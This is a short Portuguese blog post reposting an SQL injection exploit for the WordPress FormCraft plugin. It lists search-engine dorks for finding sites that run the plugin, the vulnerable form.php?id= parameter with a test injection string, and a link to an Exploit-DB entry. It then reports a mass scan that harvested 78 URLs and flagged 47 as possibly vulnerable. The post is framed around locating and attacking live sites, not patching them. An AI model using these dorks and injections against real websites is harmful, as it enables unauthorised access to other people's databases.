Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

domingo, 15 de dezembro de 2013

Wordpress formcraft Plugin Sql Injection Mais SCANNER INURL

Wordpress formcraft Plugin Sql Injection


#################################################################################
# Exploit Author : Ashiyane Digital Security Team
#
#DORK[0] inurl:/wp-content/plugins/formcraft
#DORK[1] inurl:/wp-content/plugins/formcraft/form.php?id=
#
# Testado: Windows , Linux
#################################################################################
# Tipo Exploit : Sql Injection
#
# Local: [alvo]/wp-content/plugins/formcraft/form.php?id=[Sql]
# Exploit-DB Note:
# Injeção de exploit: form.php?id=1%20and%20 1=1
# Exploit: http://www.exploit-db.com/exploits/30002/
#################################################################################

Usando o  SCANNER INURL 1.0 - INTERFACE para capturar URL's com esse tipo de falha.
Down: https://code.google.com/p/scanner-inurl/


CONFIGURAÇÃO
Wordpress formcraft Plugin Sql Injection SCANNER INURL
RESULTADO
Wordpress formcraft Plugin Sql Injection SCANNER INURL RESULTADO

TOTAL DE URL's: 78

EXPLOIT USADO:

DORK: inurl:/wp-content/plugins/formcraft/form.php?id=

TIPO DE ERRO: PERSONALIZADO

PROCURAR ERRO:/plugins/formcraft/js/form.js?ver=

TOTAL DE POSSÍVEIS VULL: 47

ARQUIVO COM RESULTADO: resultados.txt

2 comentários:

  1. Este comentário foi removido por um administrador do blog.

    ResponderExcluir
  2. Este comentário foi removido por um administrador do blog.

    ResponderExcluir

............